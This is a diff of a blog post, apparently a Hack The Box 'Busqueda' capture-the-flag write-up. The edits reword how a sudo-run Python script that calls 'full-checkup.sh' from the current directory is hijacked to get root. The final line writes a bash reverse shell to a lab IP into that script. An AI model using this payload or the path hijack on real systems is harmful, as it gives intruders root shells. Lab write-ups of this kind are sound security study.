0hmsec/0hmsec.github.io/_posts/en/2025-02-01-htb-busqueda.md

 ---[snip]---
 ```

-Also, we can find the source code of `system-checkup.py`.
 While analysing the code, we find an if statement for the `full-checkup` option.
 We can understand that it tries to run the script named `full-checkup.sh` from the current directory.
-From the error "Something went wrong", it is also understandable that the python script cannot find "full-checkup.sh".
+From the error "Something went wrong", it is also understandable that while we ran the python script earlier, it wasn't able to find "full-checkup.sh".

 ### Shell as root

-So, we can create our own `full-checkup.sh` and put in any bash code that we want to get executed.
-There are two ways to get a root shell.
+So, we can create our own `full-checkup.sh` in the current working directory, put in any bash code and then run the `system-checkup.py` python script.
+Now, there are two ways to get a root shell.

 #### Method-1: netcat Reverse shell

-The easiest way would be to start a netcat listener and catch the reverse shell.
+The easiest way would be to start a netcat listener and catch the reverse shell, which uses the below code.

 ```bash
 svc@busqueda:/tmp$ echo -ne '#!/bin/bash\n/bin/bash -i >& /dev/tcp/10.10.14.21/8888 0>&1' > full-checkup.sh